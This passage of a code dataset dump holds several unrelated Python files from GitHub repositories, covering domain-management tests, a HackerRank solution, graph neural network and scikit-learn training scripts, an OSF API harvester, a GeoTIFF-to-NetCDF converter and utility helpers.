epp = {\n \"name\": \"test-something.bar\",\n \"rem\": {\n \"contact\": [{\"admin\": \"contact-123\"}]\n },\n \"add\": {\n \"contact\": [{\"admin\": \"contact-223\"}]\n }\n }\n domain_manager = DomainManager(self.registered_domain)\n domain_manager.update(epp)\n new_admin_contact = self.registered_domain.contacts.filter(\n active=True,\n contact__registry_id=\"contact-223\",\n contact_type__name=\"admin\"\n )\n self.assertTrue(new_admin_contact.exists(),\n \"New contact was added to domain\")\n old_admin_contact = self.registered_domain.contacts.filter(\n active=True,\n contact__registry_id=\"contact-123\",\n contact_type__name=\"admin\"\n )\n self.assertFalse(old_admin_contact.exists(),\n \"Old contact removed\")\n","repo_name":"heytrav/drs-api","sub_path":"domain_api/tests/test_entity_management.py","file_name":"test_entity_management.py","file_ext":"py","file_size_in_byte":7092,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"3155056000","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'isValid' function below.\n#\n# The function is expected to return a STRING.\n# The function accepts STRING s as parameter.\n#\n\ndef isValid(s):\n # Write your code here\n str_dict = dict()\n for letter in s:\n str_dict.setdefault(letter, 0)\n str_dict[letter] += 1\n \n values = []\n for value in str_dict.values():\n values.append(value)\n \n if min(values) == max(values):\n return 'YES'\n else:\n if min(values) == 1 and values.count(1) == 1:\n if values.count(max(values)) == len(values) - 1:\n return 'YES'\n for i in range(len(values)):\n if values[i] == max(values):\n values[i] -= 1\n break\n if min(values) == max(values):\n return 'YES'\n return 'NO'\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n s = input()\n\n result = isValid(s)\n\n fptr.write(result + '\\n')\n\n fptr.close()\n","repo_name":"IgnatIvanov/HackerRank","sub_path":"3 Months Preparation Kit/Week 07/Sherlock and the Valid String/Sherlock and the Valid String.py","file_name":"Sherlock and the Valid String.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13361037056","text":"from locale import strcoll\nimport os.path as osp\n\nimport torch\nimport torch.nn.functional as F\nfrom torch.nn import GRU, Linear, ReLU, Sequential\n\nimport torch_geometric.transforms as T\nfrom torch_geometric.datasets import ModelNet\nfrom torch_geometric.loader import DataLoader\nfrom torch_geometric.nn import NNConv, Set2Set,GCNConv,GIN,GatedGraphConv\nfrom torch_geometric.utils import remove_self_loops\nfrom Data_MP_MOL import MP_ESOL,MP_OGBHIV,MP_OGBPCBA,MP_Lipo\nfrom Data_MPZINC import MP_ZINC\nfrom Data_MPQM9 import MP_QM9\nfrom models import MPMol\nimport sys\nimport argparse\nparser=argparse.ArgumentParser()\nparser.add_argument('--dataset',default='qm9',type=str)\nparser.add_argument('--t',default=0,type=int)\nparser.add_argument('--dim',type=int,default=64)\nparser.add_argument('--epoch',default=2,type=int)\nparser.add_argument('--o',type=str,default='runs')\nparser.add_argument('--model',default='mpmol')\nparser.add_argument('--gpu',default='0',type=str)\nparser.add_argument('--recurs',defualt=3,type=int)\nparser.add_argument('--nheads',type=int,default=8)\nparser.add_argument('--dropout',type=float,default=0.5)\nargs=parser.parse_args()\ntarget = args.t\ndim = args.dim\n\nclass MyTransform(object):\n def __call__(self, data):\n data.y = data.y[:, target]\n return data\n\nclass Complete(object):\n def __call__(self, data):\n device = data.edge_index.device\n\n row = torch.arange(data.num_nodes, dtype=torch.long, device=device)\n col = torch.arange(data.num_nodes, dtype=torch.long, device=device)\n\n row = row.view(-1, 1).repeat(1, data.num_nodes).view(-1)\n col = col.repeat(data.num_nodes)\n edge_index = torch.stack([row, col], dim=0)\n\n edge_attr = None\n if data.edge_attr is not None:\n idx = data.edge_index[0] * data.num_nodes + data.edge_index[1]\n size = list(data.edge_attr.size())\n size[0] = data.num_nodes * data.num_nodes\n edge_attr = data.edge_attr.new_zeros(size)\n edge_attr[idx] = data.edge_attr\n\n edge_index, edge_attr = remove_self_loops(edge_index, edge_attr)\n data.edge_attr = edge_attr\n data.edge_index = edge_index\n\n return data\n\nif args.dataset.lower()=='qm9':\n path ='dataset/QM9'\n transform = T.Compose([MyTransform(), Complete(), T.Distance(norm=False)])\n dataset = MP_QM9(path, transform=transform).shuffle()\nelif args.dataset.lower()=='zinc':\n path ='dataset/zinc_origin'\n transform = T.Compose([MyTransform(), Complete(), T.Distance(norm=False)])\n dataset = MP_ZINC(path, transform=transform).shuffle()\nelif args.dataset.lower()=='mutag':\n path='dataset/MUTAG'\n transform = T.Compose([MyTransform(), Complete(), T.Distance(norm=False)])\n dataset = ModelNet(path,'MUTAG', transform=transform).shuffle()\nelif args.dataset.lower()=='nci':\n path='dataset/NCI1'\n transform = T.Compose([MyTransform(), Complete(), T.Distance(norm=False)])\n dataset = ModelNet(path,'nci', transform=transform).shuffle()\nelif args.dataset.lower()=='ptc':\n path='dataset/PTC_FR'\n transform = T.Compose([MyTransform(), Complete(), T.Distance(norm=False)])\n dataset = ModelNet(path,'ptc', transform=transform).shuffle()\nelif args.dataset.lower()=='hiv':\n path='dataset/hiv'\n transform = T.Compose([MyTransform(), Complete(), T.Distance(norm=False)])\n dataset = MP_OGBHIV(path,'ptc', transform=transform).shuffle()\nelif args.dataset.lower()=='pcba':\n path='dataset/pcba'\n transform = T.Compose([MyTransform(), Complete(), T.Distance(norm=False)])\n dataset = MP_OGBPCBA(path,'ptc', transform=transform).shuffle()\n\n\n\nmean = dataset.data.y.mean(dim=0, keepdim=True)\nstd = dataset.data.y.std(dim=0, keepdim=True)\ndataset.data.y = (dataset.data.y - mean) / std\nmean, std = mean[:, target].item(), std[:, target].item()\nl_data=len(dataset.data)\n\ntest_dataset = dataset[:int(l_data*0.1)]\nval_dataset = dataset[int(l_data*0.1):int(l_data*0.2)]\ntrain_dataset = dataset[int(l_data*0.2):]\ntest_loader = DataLoader(test_dataset, batch_size=128, shuffle=False)\nval_loader = DataLoader(val_dataset, batch_size=128, shuffle=False)\ntrain_loader = DataLoader(train_dataset, batch_size=128, shuffle=True)\n\n\nif torch.cuda.is_available() and args.gpu!='cpu':\n device='cuda:'+args.gpu\nelse:\n device='cpu'\ndevice=torch.device(device)\nif args.model.lower()=='mpmol':\n model=model = MPMol(infeat=dataset.node_dim, dim=args.hidden, edge_dim=dataset.edge_dim, nheads=args.nheads, dropout=args.dropout, recurs=args.recurs)\n\n\noptimizer = torch.optim.Adam(model.parameters(), lr=0.001)\nscheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, mode='min',\n factor=0.7, patience=5,\n min_lr=0.00001)\n\n\ndef train():\n model.train()\n loss_all = 0\n for data in train_loader:\n data = data.to(device)\n optimizer.zero_grad()\n loss = F.mse_loss(model(data), data.y)\n loss.backward()\n loss_all += loss.item() * data.num_graphs\n optimizer.step()\n return loss_all / len(train_loader.dataset)\n\n\ndef test(loader):\n model.eval()\n absolute_error = 0\n std_error=0\n for data in loader:\n data = data.to(device)\n stand_y_pred=model(data)\n absolute_error += (stand_y_pred * std - data.y * std).abs().sum().item() # MAE\n\n std_error+=(stand_y_pred-data.y).abs().sum().item()\n return absolute_error / len(loader.dataset),std_error/ len(loader.dataset)\n\nbest_val_error = None\nsave_name='|%s|target%d|ep%d|dim%d|'%(args.model,args.t,args.epoch,args.dim)\noutfile=open(osp.join(args.o,save_name+'.txt'),'w')\nprint('mean:%.4f,std:%.4f'%(mean,std),file=outfile,end='\\n')\nfor epoch in range(1, args.epoch):\n lr = scheduler.optimizer.param_groups[0]['lr']\n loss = train(epoch)\n val_error,_ = test(val_loader)\n scheduler.step(val_error)\n if best_val_error is None or val_error <= best_val_error:\n test_mae,test_stdmae = test(test_loader)\n best_val_error = val_error\n prt=f'Epoch: {epoch:03d}, LR: {lr:7f}, Loss: {loss:.7f}, '+f'Val MAE: {val_error:.7f}, Test MAE: {test_mae:.7f}, Test stdMAE: {test_stdmae:.7f}'\n print(prt,file=outfile,end='\\n')\n print(prt)\noutfile.close()\nsave_path=osp.join('save_model','checkpoint_'+save_name)\ntorch.save(model,save_path+'.pt')","repo_name":"valerieJJ/MPMol","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6388,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"23874159524","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 13 12:25:16 2019\n\n@author: usuario\n\nejemplo del pipline y por que sirve:\n https://dreisbach.us/articles/building-scikit-learn-compatible-transformers/\n \notras formas de hacerlo:\n https://towardsdatascience.com/a-simple-example-of-pipeline-in-machine-learning-with-scikit-learn-e726ffbb6976\n https://github.com/suvoooo/Machine_Learning/blob/master/pipelineWine.py\n\nAyuda:\n https://stackoverflow.com/questions/50965004/sklearn-custom-transformers-difference-between-using-functiontransformer-and-su\n \n\"\"\"\n\n\n#importo\nimport pandas as pd\nimport networkx as nx\nimport numpy as np\n\nimport grafos_funciones_paquete as gfp #tiene funciones\nimport grafos_funciones_paquete_V2 as gfp2 #tiene transformers\n\n\n#data de ejemplo\nnum_nodos = 200\nnum_aristas = 350\nG = nx.gnm_random_graph(num_nodos , num_aristas) \nf = pd.DataFrame(data = {'name': range(num_nodos),\n 'col1': np.random.rand(num_nodos), \n 'col2': np.random.rand(num_nodos) > 0.5})\n\n#nx.draw(G)\n\nprint(f.head())\nf = gfp.betweenness(G,f)\nf = gfp.pagerank(G,f)\nf = gfp.communities_label_propagation(G,f)\nprint(f.head())\nf[\"target\"] = [1 if i >0.005 else 0 for i in f.pagerank]\n\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import SVC\nfrom sklearn.model_selection import RandomizedSearchCV\n\n\nX=f.drop(['target'],axis=1)\nY=f['target']\n\n#++++++++++++++++++++++++++++++++\n# create the pipeline object\n#++++++++++++++++++++++++++++++++\nDumb = gfp2.Dumb(5)\nReplace1 = gfp2.Replace(np.nan,-1)\nReplace2 = gfp2.Replace(np.inf,-1)\nDegree = gfp2.Degree(G)\nDropName = gfp2.DropName()\nBetweenness = gfp2.Betweenness(G)\nPagerank = gfp2.Pagerank(G)\nClustering = gfp2.Clustering(G)\nCentrality = gfp2.Centrality(G)\nCommunities_label_propagation = gfp2.Communities_label_propagation(G)\nCommunities_greedy_modularity = gfp2.Communities_greedy_modularity(G)\nMean_neighbors = gfp2.Mean_neighbors(G, \"col1\", 1)\nStd_neighbors = gfp2.Std_neighbors(G, \"col1\", 1)\nMax_neighbors = gfp2.Max_neighbors(G, \"col1\", 1)\nMin_neighbors = gfp2.Min_neighbors(G, \"col1\", 1)\nParticipation_coefficient = gfp2.Participation_coefficient(G, \"communities_label_propagation\")\nWithin_module_degree = gfp2.Within_module_degree(G, \"communities_label_propagation\")\nNode_embeddings = gfp2.Node_embeddings(G)\n\n\ndef aux_f1(G):\n return [0 for i in G.nodes()]\n\ndef aux_f2(G, X):\n return [0 for i in G.nodes()]\n\nGraph_fuction = gfp2.Graph_fuction(G, aux_f1)\nGraph_features_fuction = gfp2.Graph_features_fuction(G, aux_f2)\n\nsteps = [#(\"nioqui\", Dumb), (\"Degree\", Degree), (\"Degree2\", Degree), \n #(\"Betweenness\", Betweenness), (\"Pagerank\", Pagerank), (\"Centrality\", Centrality), \n #(\"CLP\", Communities_label_propagation), (\"CGM\", Communities_greedy_modularity),\n #(\"mean\", Mean_neighbors), (\"std\", Std_neighbors), (\"max\", Max_neighbors), (\"min\", Min_neighbors), \n #(\"PC\", Participation_coefficient), (\"WMD\", Within_module_degree), \n #(\"embeddings\", Node_embeddings), \n #(\"Graph_fuction\", Graph_fuction), (\"Graph_features_fuction\", Graph_features_fuction)\n (\"Clustering\", Clustering),\n (\"DropName\", DropName), (\"FillNans\", Replace1), (\"FillInf\", Replace2), \n ('scaler', StandardScaler()), ('SVM', SVC())]\n\npipeline = Pipeline(steps)\n\n\n#++++++++++++++++++++++++++++++++++++++\n#+ create the hyperparameter space\n#++++++++++++++++++++++++++++++++++++++\n\nparameteres = {'SVM__C':[0.001,0.1,10,100,10e5], 'SVM__gamma':[0.1,0.01]}\n\n#++++++++++++++++++++++++++++++++++++\n#+ create train and test sets\n#++++++++++++++++++++++++++++++++++++\n\nX_train, X_test, y_train, y_test = train_test_split(X,Y,test_size=0.2, random_state=30, stratify=Y)\n\n#print X_test.shape\n\n#++++++++++++++++++++++++++++++\n#+ Grid Search Cross Validation\n#++++++++++++++++++++++++++++++\ngrid = RandomizedSearchCV(pipeline, param_distributions = parameteres, cv=5, n_iter = 2)\n\ngrid.fit(X_train, y_train)\n\nprint('score: ', grid.score(X_test,y_test)) \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"EquisGBustos/-scikit-graph","sub_path":"grafos_funciones_paquete_probando_V2.py","file_name":"grafos_funciones_paquete_probando_V2.py","file_ext":"py","file_size_in_byte":4149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"456741129","text":"data = input()\ncount_zero = 0 # 전부 0으로 바꾸는 경우\ncount_one = 0 # 전부 1로 바꾸는 경우\n\nif data[0] == '1': # 0을 1로 바꾸는 경우\n count_one += 1\nelse: # 1을 0으로 바꾸는 경우\n count_zero += 1\n\nfor i in range(len(data)-1): # 원소를 확인하면서\n if data[i] != data[i+1]:\n if data[i+1] == '1': # 1로 바뀌는 경우\n count_one += 1\n else: # 0으로 바뀌는 경우\n count_zero += 1\n\nprint(min(count_zero,count_one))","repo_name":"ljseok/GreedyAlgorithm","sub_path":"문자열 뒤바꾸기.py","file_name":"문자열 뒤바꾸기.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43048016932","text":"'''\nGiven a binary tree, flatten it to a linked list in-place.\n'''\n#\n# @lc app=leetcode id=114 lang=python3\n#\n# [114] Flatten Binary Tree to Linked List\n#\n\n# @lc code=start\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\n\nclass Solution:\n def flatten(self, root: TreeNode) -> None:\n \"\"\"\n Do not return anything, modify root in-place instead.\n \"\"\"\n if root == None:\n return root\n\n self.recursive(root)\n\n def recursive(self, root):\n if root.left == None and root.right == None:\n return root\n\n left_tail = None\n right_tail = None\n\n if root.left:\n left_tail = self.recursive(root.left)\n\n if root.right:\n right_tail = self.recursive(root.right)\n\n if left_tail:\n left_tail.right = root.right\n root.right = root.left\n root.left = None\n\n return right_tail if right_tail != None else left_tail\n\n\n# @lc code=end\n","repo_name":"joyceyu6/coding_courses","sub_path":"2021_4_19_to372/Binary Tree_114.flatten-binary-tree-to-linked-list.py","file_name":"Binary Tree_114.flatten-binary-tree-to-linked-list.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6827296053","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom integrate import *\n\n\ndef calc_capacity(T, num=50):\n # constants in the problem\n # volume of solid\n V = 1000 / 1e6\n # density o atoms\n rho = 6.022e28\n # boltzmann's constant\n k_b = 1.3906e-23\n # debye temperature\n theta_d = 428\n\n def integrand(x):\n return x ** 4 * np.exp(x) / ((np.exp(x) - 1) ** 2)\n\n result = simpson_integrate(integrand, 0+1e-9, theta_d / T, num_of_int=num)\n result = 9 * V * rho * k_b * (T / theta_d) ** 3 * result\n\n return result\n\n\ntry:\n t = np.linspace(0, 500, 10000)\n cap = [calc_capacity(val) for val in t]\nexcept RuntimeError:\n pass\n\nplt.figure()\nplt.title('Debye model')\nplt.plot(t, cap, label='Aluminium')\nplt.legend()\nplt.xlabel(r'$T / $' + 'K')\nplt.ylabel(r'$C_v / $' + '$($' + 'J/K' + '$^{-1})$')\nplt.grid()\nplt.show()\n\nexit()\n\n","repo_name":"Jokiva/Computational-Physics","sub_path":"lecture 10/Problem 1.py","file_name":"Problem 1.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"16431725692","text":"import pickle\nimport time\nimport torch.nn.functional as F\nimport numpy as np\nimport ot\nimport random\nfrom math import cos, sin, pi\nimport torch\n\n\n\ndef angle_vector(angle):\n\n return [cos(angle*pi/ 180), sin(angle*pi/ 180)]\ndef getArotateM(angle): # 得到一个旋转矩阵(二维的)\n\n angle_pi = angle*pi/ 180\n return [[cos(angle_pi), -sin(angle_pi)],\n [sin(angle_pi), cos(angle_pi)]]\n\n\ndef load_smiles(filename):\n with open(filename) as f:\n a = [line.strip('\\n') for line in f]\n return a\n\n\ndef batchi_replace(tensor, percent, value, min_max ):\n shape = tensor.shape\n num_dim = len(shape)\n num_points = int(torch.prod(torch.tensor(shape))*percent)\n \n points = torch.zeros(num_points,num_dim).int()\n \n for index, d in enumerate(shape):\n points[:,index] = torch.tensor(np.random.choice(range(d), num_points))\n \n tensor[[p for p in points.T]] = value\n \n return tensor\n\n\n\ndef compute_distances(P, C):\n \"\"\"\n \n \"\"\"\n A = (P**2).sum(axis=1, keepdims=True) #先对P求平方;然后按行求和,并且保持维度。得到一个5行1列的向量。\n \n B = (C**2).sum(axis=1, keepdims=True).T #得到一个1行4列的向量。\n \n return np.sqrt(A + B - 2* np.dot(P, C.T)) #A+B会广播运算加法。np.dot()是矩阵相乘。\n \n# if __name__ == \"__main__\":\n# P = np.random.randint(1, 5, (5, 3)) #5行3列。5个三维向量。\n# C = np.random.randint(1, 5, (4, 3)) #4行3列。4个三维向量。\n# dist = compute_distances(P, C)\n \n# print(P)\n# print(C)\n# print(dist)\n\n\n\ndef reorder(a_point,b_point):\n \"\"\"\n \"\"\"\n len_a = len(a_point) \n len_b = len(b_point)\n dis_M = compute_distances(a_point,b_point)\n aw , bw = np.ones(len_a), np.ones(len_b)\n orderM = ot.emd(aw, bw, dis_M)\n b_point_od = np.matmul(orderM,b_point)\n \n return a_point,b_point_od, orderM\n \n\n# 模型保存\ndef model_save(model,Train_loss_value\n ,Train_loss_sig\n ,Train_loss\n ,Val_loss_value\n ,Val_loss_sig\n ,Val_loss):\n time_s = time.strftime(\"%Y-%m-%d_%Hh%Mm%Ss\", time.localtime())\n torch.save({'epoch': len(Train_loss),\n 'model': model.state_dict(),\n 'model_optimizer': optimizer.state_dict(),\n\n \"Train_loss_value\": Train_loss_value,\n \"Train_loss_sig\": Train_loss_sig,\n \"Train_loss\": Train_loss,\n \"Val_loss_value\": Val_loss_value,\n \"Val_loss_sig\": Val_loss_sig,\n \"Val_loss\": Val_loss,\n }, \n 'model_save/model_save_main_drugs_all_{}.pth'.format(time_s))\n print(f'Epoch {len(Train_loss)} - Saved Model')\n\ndef repeat_tensor_by_numlist(tensor, numlist):\n \"\"\"\n \n \"\"\"\n shape = tensor.shape\n\n tensor_list = []\n for i, num_confs in enumerate(numlist):\n wqe = torch.ones([len(shape)])\n wqe[0] = num_confs\n wqe = tuple(wqe.int().cpu().numpy().tolist())\n tensor_i = tensor[i].unsqueeze(0).repeat(wqe)\n tensor_list.append(tensor_i)\n\n tensor_n = torch.cat(tensor_list, dim=0)\n\n return tensor_n \n\n\ndef repeat_list_by_numlist(list_, numlist):\n list_new = []\n [list_new.extend([list_[i]]*numlist[i]) for i in range(len(list_))]\n return list_new\n\ndef group_by_num(list_, numlist):\n \"\"\"\n \n \"\"\"\n group_list = []\n len_ = len(numlist)\n for i in range(len_):\n groupi = list_[:numlist[i]]\n list_ = list_[numlist[i]:]\n \n group_list.append(groupi)\n \n return group_list\n\n\n\ndef pad_list(x,lengh,value):\n return x + [value for i in range(lengh - len(x))]\n\n\nclass pickle_:\n def save(file_name, var):\n if file_name[-4:] != \".pkl\":\n file_name+=\".pkl\"\n with open(file_name,\"wb\") as pf:\n pickle.dump(var, pf)\n print (time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n print(f\"save_to_{file_name}\")\n def load(file_name):\n with open(file_name,\"rb\") as pf:\n unk = pickle.load(pf)\n return unk\n \n \n \n# --------------------------------------------------------------- \ndef get_intersection_tensor(tensor, toshape):\n intersection_shape = []\n for i in range(len(tensor.shape)):\n if tensor.shape[i] - toshape[i]>=0:\n intersection_shape.append(toshape[i])\n\n else:\n intersection_shape.append(tensor.shape[i])\n\n return tensor[: intersection_shape[0], : intersection_shape[1], : intersection_shape[2], : intersection_shape[3]]\n\n\ndef get_pad_tensor(tensor, toshape, value=0):\n pad_list = []\n for i in range(1, len(tensor.shape)+1):\n i = -i\n if toshape[i] - tensor.shape[i]==0:\n pad_list.extend([0,0])\n \n elif toshape[i] - tensor.shape[i]>0:\n pad_list.extend([0,toshape[i] - tensor.shape[i]]) \n \n else:\n raise ValueError\n \n pad_tensor = F.pad(tensor, pad_list,\"constant\", value=value)\n return pad_tensor\n\ndef my_reshape_func(tensor, toshape, pad_value=0):\n \n \n intersection_tensor = get_intersection_tensor(tensor, toshape)\n pad_tensor = get_pad_tensor(intersection_tensor, toshape, value=pad_value)\n return pad_tensor\n\n# tensor = torch.rand([3,3,2,6])\n# toshape = (4,6,2,3)\n# reshape_tensor = my_reshape_func(tensor, toshape, pad_value=0)\n# tensor.shape, reshape_tensor.shape\n\n# ========================================================================\n\n\n\n\ndef info(tensor):\n return tensor.shape, tensor.min(), tensor.max()\n\n\n\ndef save_list(list_, file_path):\n f = open(file_path, \"w\")\n\n for i in list_:\n f.write(i + \"\\n\")\n f.close()\n \ndef load_list(file_path):\n with open(file_path, \"r\") as f:\n list_ = [line.strip('\\n') for line in f]\n return list_\n \n \ndef get_idxs_bylist(list1, list2):\n \"\"\"\n \"\"\"\n idxs = []\n for i in list1:\n try:\n idx = list2.index(i)\n idxs.append(idx)\n except ValueError as e:\n continue \n return idxs ","repo_name":"zimeizhng/Tora3D","sub_path":"utils_base.py","file_name":"utils_base.py","file_ext":"py","file_size_in_byte":6177,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"21427494322","text":"import logging\nfrom typing import Tuple\nfrom typing import Union\nfrom typing import Iterator\n\nimport arrow\nfrom furl import furl\n\nfrom share.harvest.harvester import Harvester\n\nlogger = logging.getLogger(__name__)\n\n\nclass OSFHarvester(Harvester):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.url = 'https://api.osf.io/v2/nodes/'\n\n def do_harvest(self, start_date: arrow.Arrow, end_date: arrow.Arrow) -> Iterator[Tuple[str, Union[str, dict, bytes]]]:\n\n url = furl(self.url)\n\n url.args['page[size]'] = 100\n url.args['filter[public]'] = 'true'\n url.args['embed'] = 'affiliated_institutions'\n url.args['filter[date_modified][gt]'] = start_date.date().isoformat()\n url.args['filter[date_modified][lt]'] = end_date.date().isoformat()\n\n return self.fetch_records(url)\n\n def fetch_records(self, url: furl) -> Iterator[Tuple[str, Union[str, dict, bytes]]]:\n records, next_page = self.fetch_page(url)\n total_records = records.json()['links']['meta']['total']\n\n total_harvested = 0\n while True:\n for record in records.json()['data']:\n\n # iterate the linked contributors data in a new key in the record\n contributor_url = furl(record['relationships']['contributors']['links']['related']['href'])\n contributor_url.args['page[size]'] = 100\n contributor_records, next_contributor_page = self.fetch_page(contributor_url)\n total_contributors = contributor_records.json()['links']['meta']['total']\n contributor_data = []\n while True:\n contributor_data = contributor_data + contributor_records.json()['data']\n if not next_contributor_page:\n break\n contributor_records, next_contributor_page = self.fetch_page(next_contributor_page)\n logger.info('Had {} contributors to harvest, harvested {}'.format(total_contributors, len(contributor_data)))\n record['contributors'] = contributor_data\n\n # gather the the rest of the record\n total_harvested += 1\n yield (record['id'], record)\n\n if not next_page:\n break\n records, next_page = self.fetch_page(next_page)\n\n logger.info('Had {} records to harvest, harvested {}'.format(total_records, total_harvested))\n\n def fetch_page(self, url: furl, next_page: str=None) -> (list, str):\n logger.info('Making request to {}'.format(url.url))\n\n records = self.requests.get(url.url)\n next_page = records.json()['links'].get('next')\n next_page = furl(next_page) if next_page else None\n\n logger.info('Found {} records.'.format(len(records.json()['data'])))\n\n return records, next_page\n","repo_name":"pattisdr/SHARE","sub_path":"providers/io/osf/harvester.py","file_name":"harvester.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"41870152013","text":"from os import path\nimport sys\n\nimport click\nimport xarray as xr\n\nfrom mapshader.transforms import cast\nfrom mapshader.transforms import flip_coords\nfrom mapshader.transforms import orient_array\nfrom mapshader.transforms import reproject_raster\nfrom mapshader.transforms import squeeze\n\n\n@click.command(\n no_args_is_help=True,\n context_settings=dict(help_option_names=['-h', '--help']),\n short_help='Convert GeoTIFF raster file format into a NetCDF file.',\n help=(\n 'Convert GeoTIFF raster file format into a NetCDF file '\n 'given the `FILEPATH` relative path.'\n ),\n)\n@click.argument(\n 'filepath',\n type=str,\n required=True,\n)\n@click.option(\n '--x',\n type=str,\n default='x',\n show_default=True,\n help='The x dimension name.',\n)\n@click.option(\n '--y',\n type=str,\n default='y',\n show_default=True,\n help='The y dimension name.',\n)\n@click.option(\n '--chunks',\n type=tuple,\n default=(512, 512),\n show_default=True,\n help='Coerce into dask arrays with the given chunks.',\n)\n@click.option(\n '--data_variable',\n type=str,\n default='data',\n show_default=True,\n help='The data variable name.',\n)\n@click.option(\n '--fill_na',\n type=int,\n default=-9999,\n show_default=True,\n help='Fill NaN values with the given value.',\n)\n@click.option(\n '-c',\n '--cast',\n 'dtype',\n default='int16',\n show_default=True,\n help='Cast the data to the given type.',\n)\n@click.option(\n '-r',\n '--reproject',\n 'crs',\n type=int,\n default=3857,\n show_default=True,\n help='Reproject the data to the given CRS.',\n)\ndef tif_to_netcdf(\n filepath,\n x,\n y,\n chunks,\n data_variable,\n fill_na,\n dtype,\n crs,\n):\n '''\n Convert GeoTIFF raster file format into a NetCDF file given the\n `FILEPATH` relative path.\n\n Parameters\n ----------\n filepath : str\n GeoTIFF raster file relative path.\n x : str\n The x dimension name.\n y : str\n The y dimension name.\n chunks : tuple of int\n The dask array chunk size for the x and y dimension.\n data_variable : str\n The data variable name.\n fill_na : int or float\n Fill NaN values with the given value.\n dtype : str\n Cast the data to the given type.\n crs : int\n Reproject the data to the given CRS.\n '''\n input_file = path.abspath(path.expanduser(filepath))\n output_file = input_file.replace('.tif', '.nc')\n\n print(\n 'Converting {0} from GeoTIFF to NetCDF file'.format(input_file),\n file=sys.stdout,\n )\n\n arr = xr.open_rasterio(input_file)\n\n # Check if the given dimensions exist\n for dimension in (x, y):\n if dimension not in arr.dims:\n raise click.BadParameter(\n \"The dimension name {} doesn't exist.\".format(dimension)\n )\n\n arr = squeeze(arr, [d for d in arr.dims if d != x and d != y])\n arr = cast(arr, dtype=dtype)\n arr = orient_array(arr)\n arr = flip_coords(arr, dim=y)\n arr = reproject_raster(arr, epsg=crs)\n\n dataset = xr.Dataset(\n data_vars={data_variable: (['y', 'x'], arr.chunk(chunks).data)},\n coords={'x': arr.coords[x], 'y': arr.coords[y]},\n )\n dataset.attrs = dict(name=data_variable)\n dataset.to_netcdf(\n path=output_file,\n encoding={data_variable: {'_FillValue': fill_na}},\n )\n\n print(\n 'Conversion complete: {0}'.format(output_file),\n file=sys.stdout,\n )\n","repo_name":"makepath/mapshader","sub_path":"mapshader/commands/tif_to_netcdf.py","file_name":"tif_to_netcdf.py","file_ext":"py","file_size_in_byte":3492,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"3"} +{"seq_id":"20052742833","text":"import pandas as pd\n\n\nexeption_cat = {\n \"Neuroanatomy Other\": \"Neuroanatomy, Physiology, Metabolism and Neurotransmission Other\",\n \"Informatics Other\": \"Neuroinformatics and Data Sharing Other\",\n \"Emotion and Motivation Other\": \"Emotion, Motivation and Social Neuroscience Other\",\n \"Non-Invasive Stimulation Methods Other\": \"Non-Invasive Methods Other\",\n \"Invasive Stimulation Methods Other\": \"Invasive Methods Other\",\n \"Perception and Attention Other\": \"Perception, Attention and Motor Behavior Other\",\n \"Other Methods\": \"Modeling and Analysis Methods Other\",\n \"Social Neuroscience Other\": \"Emotion, Motivation and Social Neuroscience Other\",\n}\n\n\ndef add_urls(df_abstract, df_raw):\n \"\"\"Add associated pdf and video link to abstract\"\"\"\n df_abstract[\"pdf\"] = None\n # df_abstract[\"video\"] = None\n df_abstract = df_abstract.set_index(\"submissionNumber\")\n df_raw = df_raw.set_index(\"submissionNumber\")\n media_links = pd.read_csv(\"data/ohbm-ALL-poster-links.csv\")\n media_links[\"Title\"] = media_links[\"Title\"].apply(str.lower)\n\n for idx, row in df_abstract.iterrows():\n if str(idx) in df_raw.index:\n speakers = df_raw.loc[str(idx), \"speakers\"][\"speaker\"]\n email = speakers[0][\"email\"]\n title = str.lower(row[\"title\"])\n # filter out people with more than one first author paper\n mask = media_links[\"Email\"].isin([email]) & media_links[\n \"Title\"\n ].isin([title])\n # this is not entirely reliable\n if sum(mask) == 1:\n pdf, video = media_links.loc[\n mask, [\"PDF Link\", \"Thumbnail Link\"]\n ].values.tolist()[0]\n df_abstract.loc[idx, \"pdf\"] = pdf\n # df_abstract.loc[idx, \"video\"] = video\n return df_abstract.reset_index()\n\n\ndef compile_authros_index(df_accepted):\n \"\"\"Get author name and associated posters.\"\"\"\n authors = authro_index_ref(df_accepted)\n df_authors = pd.DataFrame(\n columns=[\"lastname\", \"firstname\", \"submissionNumber\"]\n )\n for author in authors.values():\n if 